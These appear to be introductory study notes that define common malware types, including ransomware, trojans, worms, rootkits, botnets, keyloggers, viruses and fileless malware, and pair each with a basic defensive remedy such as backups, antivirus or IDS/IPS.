Malicious Code
This chapter we will be going over the different types of malicious code and what affect they could have on a system
Types
Ransomware
Takes over a user’s computer and demands a ransom,
Can take many forms
Encrypts files
Police involvement
Remedy for this
Effective backup system
Trojans
Masks itself as a legitimate program inciting the user to download before unleashing the payload which typically will be a RAT Remote Access Trojans
Remedy for this
Anti-virus/ malware detector
Security smart don’t download from untrusted sources
Worms
worms require no user interaction to spread, worms can spread through email attachments, network shares, and other methods. They Also Can self-install making them very dangerous
Rootkits
Rootkits are malware that are designed to exploit backdoors they also include the capability to conceal themselves from detection which make them quite dangerous
Remedy for this
Integrity checking and data validation against expected responses then the most recommended solution is to restore from a backup or a fresh install
Backdoors
Backdoors are methods or tools that bypass normal authentication procedures allowing attackers access to the system
Backdoors can be both hardware and software based
Remedy for this
Check the ports that are open for example web based back doors
Bots
Bots are remotely controlled systems that are infected with malware , a group of these devices are called a botnet, they can be used to cause denial of service for websites and much more
Bot net command and control is most commonly used where the command and control machine operates in client-server mode which provides commands for the other machines
Many botnets use fast flux dns which uses many ip addresses that answer queries for one or more fully qualified DNS names. The rapid changes in the dns server and zone make it difficult to track
Remedy for this
The uses of IPS and IDS to detect the traffic flow then reverse engineering can be used to identify the flow of the bot
Key Loggers
Keyloggers are programs that capture keystrokes from keyboards
The aim of keyloggers is to capture user input from the kernel, APIs, and scripts
Remedy for this
The use of MFA (multi factual authentication)
Logic Bombs
Logic Bombs do not require malicious programs to work, they rely on functions or code which are placed inside other programs and activate when certain conditions are met.
Viruses
In short viruses are malware that self-copy and self-replicate
They require one or more infection mechanisms to spread
Viruses normally have two stages
The trigger (sets the conditions of the virus to activate)
The payload which is when the virus performs its actions
Viruses come in many forms
Memory resident viruses, remains in memory as the device is running
Non Memory resident viruses, execute, spread then shutdown
Boot sector viruses, resides in the boot sector of a drive
Macro Viruses, uses macros or code inside word processing tools to spread
Email viruses, spread through email
Fileless viruses
Fileless Viruses work in the same way normal viruses work but there is a key difference,
They inject themselves into the memory of the device and conduct further malicious activity, they also ensure they can reinfect the machine, at no point do they touch the filesystem which makes them hard to track
Ensuring you are not vulnerable is the best way to defended against this, ensure plugins are up to date etc, the use of IPS help as well, also PowerShell can be used to help stop the viruses
Spyware
Spyware is malware that is designed to gather information about an individual , this is usually used to track a user’s browsing habits but can be used to track sensitive data
Best way to combat this is to use a decent anti-virus
PUPs
Potentially unwanted Programs and programs that are not dangerous malware but can cause annoyance and take resources away from the device, they are usually downloaded without the user being aware
Most antiviruses can remove these
Malicious Code
Malicious code can come in many forms such as Scripts and custom built code.
This will use the built in tools in
Windows which are : PowerShell and visual basic
Linux which are: Bash and Python
This can also use Microsoft’s office suite macros for malicious intent
To prevent this
Log monitoring / windows command line monitoring
The use of constrained language mode for PowerShell to ensure sensitive commands are not being used